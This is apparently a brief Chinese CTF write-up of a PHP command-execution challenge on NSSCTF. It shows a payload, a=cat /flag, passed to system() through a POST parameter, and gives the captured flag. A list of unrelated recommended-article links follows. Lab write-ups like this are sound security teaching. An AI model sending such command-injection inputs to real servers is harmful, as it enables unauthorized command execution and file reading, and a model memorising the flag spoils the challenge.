开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
Johny_Zhao2 小时前
Ubuntu系统安装部署Pandawiki智能知识库游戏开发爱好者82 小时前
iOS App首次启动请求异常调试:一次冷启动链路抓包与初始化流程修复2501_915106322 小时前
频繁迭代下完成iOS App应用上架App Store:一次快速交付项目的完整回顾智者知已应修善业3 小时前
【51单片机节日彩灯控制器设计】2022-6-11薄荷椰果抹茶6 小时前
【网络安全基础】第一章---引言yanwushu6 小时前
10分钟搭建 PHP 开发环境教程Yo_Becky7 小时前
【PyTorch】PyTorch预训练模型缓存位置迁移,也可拓展应用于其他文件的迁移ONETHING_CLOUD_27 小时前
电脑系统重装有什么用?会的全对٩(ˊᗜˋ*)و8 小时前
【数据挖掘】数据挖掘综合案例—银行精准营销future14128 小时前
每日问题总结